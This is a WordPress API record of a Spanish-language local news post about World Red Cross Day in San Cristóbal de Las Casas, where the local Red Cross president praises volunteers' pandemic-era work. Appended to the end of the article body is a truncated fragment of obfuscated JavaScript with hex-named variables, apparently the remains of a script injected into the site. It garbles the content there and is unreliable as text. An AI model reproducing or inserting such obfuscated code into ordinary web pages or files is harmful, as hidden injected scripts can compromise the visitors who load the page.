{"id":1989,"date":"2022-05-09T02:21:32","date_gmt":"2022-05-09T02:21:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1989"},"modified":"2022-05-09T02:21:33","modified_gmt":"2022-05-09T02:21:33","slug":"conmemoran-dia-de-la-cruz-roja","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1989","title":{"rendered":"Conmemoran d\u00eda de la Cruz Roja"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220508-WA0046-1024x768.jpg\" alt=\"\" class=\"wp-image-1990\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220508-WA0046-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220508-WA0046-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220508-WA0046-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220508-WA0046-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220508-WA0046.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Al conmemorarse el D\u00eda Mundial de la Cruz Roja y de la Media Luna Roja, el Presidente del Consejo Directivo Local de la Cruz Roja Mexicana en San Crist\u00f3bal, Jos\u00e9 Eduardo Gonz\u00e1lez Garc\u00eda, reconoci\u00f3 el trabajo de quienes integran esta benem\u00e9rita instituci\u00f3n, reconoci\u00f3 el trabajo que hicieron en los \u00faltimos dos a\u00f1os, sobre todo por no bajar la guardia aun con la pandemia por COVID. \u201cEn los \u00faltimos dos a\u00f1os nadie estuvo sin sufrir alg\u00fan tipo de consecuencias por la pandemia, y como una muestra de bondad, con un gran esfuerzo Cruz roja hizo un gran esfuerzo para llevar alivio, agradezco a los presentes por el esfuerzo que dedicaron, adem\u00e1s de hacerlo de manera exitosa\u201d, dijo tras su participaci\u00f3n. Resalt\u00f3 que el trabajo de los que integran cruz roja es destacable, ya que ayudan a levantar en las cat\u00e1strofes, reaccionar con rapidez, y prepararse para futuras emergencias, entre otras acciones, y que en San Crist\u00f3bal han disminuido los voluntarios a 75, que por la pandemia se redujo, pero que han salidos adelante y siguen siendo una de las instancias m\u00e1s importantes. \u201cMuchas personas han sido beneficiadas en nuestra comunidad, m\u00e1s de 8 mil actos de bondad han sido llevadas a cabo por nuestra delegaci\u00f3n, muchos en servicios m\u00e9dicos, actos de servicios asistenciales y traslados de ambulancias, muchos actos de bondad en servicio a la comunidad que contagian a m\u00e1s actos\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Al conmemorarse el D\u00eda Mundial de la Cruz Roja y de la Media Luna Roja, el Presidente del Consejo Directivo Local de la Cruz Roja Mexicana en San Crist\u00f3bal, Jos\u00e9 Eduardo Gonz\u00e1lez Garc\u00eda, reconoci\u00f3 el trabajo de quienes integran esta benem\u00e9rita instituci\u00f3n, reconoci\u00f3 el trabajo que hicieron en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1990,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1989","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1989","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1989"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1989\/revisions"}],"predecessor-version":[{"id":1991,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1989\/revisions\/1991"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1990"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1989"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1989"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1989"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}